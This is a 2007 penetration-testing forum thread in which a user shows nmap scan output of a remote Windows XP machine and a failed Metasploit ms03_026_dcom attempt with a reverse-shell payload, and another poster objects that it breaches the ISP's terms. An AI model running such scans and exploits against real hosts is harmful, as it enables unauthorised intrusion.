Exploit Failed: Could not bind to....?

**FockeWulf** · 12-09-2007, 01:07 AM

Hello all. I was doing some pen testing the other day on my computer that I leave at my cousins house and im trying to get into it. (I'm trying to penetrate from the outside in).

I nmap'd the IP a few times and found two open ports.

The two ports I found (and the Syntax I used) open were...

Code:

root@desktop:~# nmap -sS -P0 -O xx.xxx.xxx.xxx

Starting Nmap 4.20 ( ://insecure.org ) at 2007-12-08 15:47 CST
Interesting ports on xx-xxx-xxx-xxx. (xx.xxx.xxx.xxx):
Not shown: 1688 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
1027/tcp open     IIS
5000/tcp open     UPnP

I found 1027 and 5000 were open. But about an hour later and I used the same Syntax and found this....

Code:

root@desktop:~# nmap -sS -P0 -O xx.xxx.xxx.xxx

Starting Nmap 4.20 ( ://insecure.org ) at 2007-12-08 15:47 CST
Interesting ports on xx-xxx-xxx-xxx. (xx.xxx.xxx.xxx):
Not shown: 1688 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
1027/tcp open     msrpc
5000/tcp open     UPnP

Does anyone have any idea why 1027 went from IIS to msrpc? This is throwing me off.

The computer's OS is Windows XP with no service packs installed and isn't behind a router.

I loaded up the Metasploit 3.0 framework and loaded the ms03_026_dcom exploit and ran a reverse shell payload ( windows/shell/reverse_tcp ).

When I get all of the options set I give the green light to exploit and here is what I get...

Code:

msf exploit(ms03_026_dcom) > exploit[*] Started reverse handler[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to ip_tcp:xx.xxx.xxx.xxx[1027] ...
[-] Exploit failed: Could not bind to ip_tcp:xx.xxx.xxx.xxx[1027]
msf exploit(ms03_026_dcom) >

As you can see all goes well up till "Exploit failed: Could not bind to ...."

Can someone tell me exactly what this means? Thanks

**thorin** · 12-10-2007, 05:32 PM

1) Your two (supposedly) different nmaps have the same timestamp.
2) http://www.metasploit.com/archive/fr.../msg01160.html
3) You're violating sbcgobal.net's usage policy(ies):
http://sbc.yahoo.com/terms
http://www.sbcglobal.net/help/legal/...ement.html#use
http://www.sbcglobal.net/help/legal/...ml#termination

**FockeWulf** · 12-12-2007, 10:51 AM

Originally Posted by thorin

1) Your two (supposedly) different nmaps have the same timestamp.

1) I forgot to copy the timestamp portion (my bad).

2) I made a mistake about the port number. The port was actually 1025 for IIS so that probably means the syntax I used was different.

Originally Posted by thorin

1)
You're violating sbcgobal.net's usage policy(ies):

How am I violating their terms of service policy(ies)? Do they not allow security testing on your own machine?

**thorin** · 12-13-2007, 04:17 PM

How am I violating their terms of service policy(ies)? Do they not allow security testing on your own machine?

No they do not.
For starters check section 9 of the first TOS link, items #1, 4, 8, 9, 10, 11, and 13 etc.

It might be your machine but it's their network.

BackTrack Linux - Penetration Testing Distribution

Thread: Exploit Failed: Could not bind to....?

Thread Tools

Search Thread

Display

Exploit Failed: Could not bind to....?

Posting Permissions